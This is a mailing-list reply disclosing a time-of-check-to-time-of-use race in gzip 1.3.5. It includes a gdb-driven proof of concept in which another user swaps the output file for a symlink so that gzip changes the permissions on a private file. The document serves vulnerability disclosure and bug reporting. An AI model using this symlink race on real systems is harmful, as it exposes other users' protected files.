Re: gzip TOCTOU file-permissions vulnerability

[Joey Hess <joeyh () debian org>]

Martin Pitt wrote:
> Of course the file can be removed by other users after gunzip has
> finished, but that is not a gzip bug, but the result of the really
> dumb idea to have a group/world-writeable directory without the sticky
> bit.

It may be really dumb, but it's pretty common practice too.
Group-writable directories are often made setgid but I've never seen one
made sticky. There's probably a lot of documentation that presents this
as best practice if you trust your group members with access to files in
the directory, and likely none of it mentions this kind of security issue.

Just a few examples within the Debian project (since this is CCed to the
Debian bts):

joeyh@haydn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld .
drwxrwsr-x    4 dummy    d-i          4096 Jan 18 12:51 ./

joeyh@gluck:/org/cdimage.debian.org/www>ls -ld .
drwxrwsr-x    4 manty    debian-c     4096 Apr  7 09:11 ./

joeyh@merkel:/org/bugs.debian.org/spool>ls -ld .
drwxrwsr-x    4 debbugs  debbugs      4096 Apr 13 09:19 ./

(gzip is not typically ran in any of these directories AFAIK, FWIW).

> Maybe I understood you wrong, could you please give a small test case
> which describes the vulnerability exactly?

I'm a wimp, so I will use gdb instead of writing some real exploit to
win the race.

joey@dragon:~/tmp/gzip-1.3.5>chmod 777 .  
joey@dragon:~/tmp/gzip-1.3.5>echo secret > ~/secret
joey@dragon:~/tmp/gzip-1.3.5>chmod 400 ~/secret
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret 
-r--------  1 joey joey 7 Apr 13 11:32 /home/joey/secret
joey@dragon:~/tmp/gzip-1.3.5>gdb ./gzip
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b copy_stat
Breakpoint 1 at 0x804ca19: file gzip.c, line 1725.
(gdb) run -9 COPYING
Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING

Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725
1725        if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) {
(gdb) 
zsh: suspended  gdb ./gzip
joey@dragon:~/tmp/gzip-1.3.5>ls -l COPYING.gz
-rw-------  1 joey joey 6853 Apr 13 11:28 COPYING.gz
joey@dragon:~/tmp/gzip-1.3.5>sudo su nobody
Password:
sh-3.00$ ln -s ~joey/secret COPYING.gz
sh-3.00$ cat COPYING.gz
cat: COPYING.gz: Permission denied
dragon% 
zsh: exit 1     sudo su nobody
joey@dragon:~/tmp/gzip-1.3.5>fg
[2]  - continued  gdb ./gzip
c
Continuing.

Program exited normally.
(gdb) quit
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r--r--r--  1 joey joey 7 Jan 12  1999 /home/joey/secret

-- 
see shy jo

Attachment: signature.asc
Description: Digital signature